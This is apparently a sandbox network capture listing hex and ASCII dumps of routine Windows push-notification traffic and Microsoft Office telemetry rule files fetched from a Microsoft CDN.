                                                                                                                                                                                              2024-11-24 12:39:39 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                              2024-11-24 12:39:39 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 7a 67 71 79 43 65 38 4e 4d 30 61 6e 6d 6b 6f 65 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 62 37 38 37 64 39 35 33 30 64 66 63 37 63 62 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 33 67 4a 6a 56 2b 4c 6c 52 52 4f 35 34 6f 43 36 51 42 74 34 30 36 63 61 52 58 54 66 66 49 6b 43 4e 76 2b 39 4b 42 47 55 31 66 4d 62 30 6c 55 62 63 77 48 78 59 4c 76 49 49 6e 4d 78 64 6c 34 6a 6b 39 51 46 63 4c 67 35 61 4c 31 4b 45 42 6c 47 71 42 77 47 34 34 67 47 63 4a 67 55 62 37 67 44 34 65 41 69 55 52 78 69 4d 78 5a 6d
                                                                                                                                                                                              Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: zgqyCe8NM0anmkoe.2Context: 6b787d9530dfc7cb<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZ3gJjV+LlRRO54oC6QBt406caRXTffIkCNv+9KBGU1fMb0lUbcwHxYLvIInMxdl4jk9QFcLg5aL1KEBlGqBwG44gGcJgUb7gD4eAiURxiMxZm
                                                                                                                                                                                              2024-11-24 12:39:39 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 7a 67 71 79 43 65 38 4e 4d 30 61 6e 6d 6b 6f 65 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 62 37 38 37 64 39 35 33 30 64 66 63 37 63 62 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: zgqyCe8NM0anmkoe.3Context: 6b787d9530dfc7cb<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                              2024-11-24 12:39:40 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                              Data Ascii: 202 1 CON 58
                                                                                                                                                                                              2024-11-24 12:39:40 UTC58INData Raw: 4d 53 2d 43 56 3a 20 6a 50 33 41 67 31 51 7a 77 45 69 72 68 4a 38 51 55 44 71 76 6c 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                              Data Ascii: MS-CV: jP3Ag1QzwEirhJ8QUDqvlw.0Payload parsing failed.


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              68192.168.2.64978013.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:39 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:40 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 485
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB9769355"
                                                                                                                                                                                              x-ms-request-id: c63dd3a8-001e-0017-61d8-3d0c3c000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123940Z-178bfbc474bh5zbqhC1NYCkdug00000005u000000000b4fa
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:40 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              69192.168.2.64978113.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:39 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:40 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 470
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                              ETag: "0x8DC582BBB181F65"
                                                                                                                                                                                              x-ms-request-id: dea688b9-b01e-003d-136c-3dd32c000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123940Z-15b8b599d88tr2flhC1TEB5gk400000004p00000000022ds
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:40 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              70192.168.2.64977913.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:40 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:40 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 411
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                              ETag: "0x8DC582B989AF051"
                                                                                                                                                                                              x-ms-request-id: 9434b372-401e-002a-4f0b-3dc62e000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123940Z-178bfbc474btvfdfhC1NYCa2en000000063g0000000038wd
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:40 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              71192.168.2.64978213.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:40 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:40 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 427
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB556A907"
                                                                                                                                                                                              x-ms-request-id: 2deeee2f-b01e-001e-4967-3b0214000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123940Z-178bfbc474btrnf9hC1NYCb80g000000061000000000bm7b
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:40 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              72192.168.2.64978313.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:40 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:40 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 502
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                                              x-ms-request-id: 5c70d6ce-001e-00ad-368c-3a554b000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123940Z-174c587ffdfmrvb9hC1TEBtn3800000004d000000000e44z
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:40 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              73192.168.2.64979313.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:42 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:42 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 474
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                                              x-ms-request-id: 671fd92a-701e-0097-24e1-3db8c1000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123942Z-178bfbc474bxkclvhC1NYC69g400000006100000000000xa
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:42 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              74192.168.2.64979213.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:42 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:42 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 407
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                              ETag: "0x8DC582B9D30478D"
                                                                                                                                                                                              x-ms-request-id: 96754fe9-301e-0052-4f54-3d65d6000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123942Z-15b8b599d88wn9hhhC1TEBry0g00000004kg000000002mkt
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:42 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              75192.168.2.64979513.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:42 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:42 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 469
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                                                              x-ms-request-id: 6fd3b960-801e-00ac-6c64-3bfd65000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123942Z-178bfbc474b9xljthC1NYCtw9400000005u0000000009ssx
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:42 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              76192.168.2.64979613.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
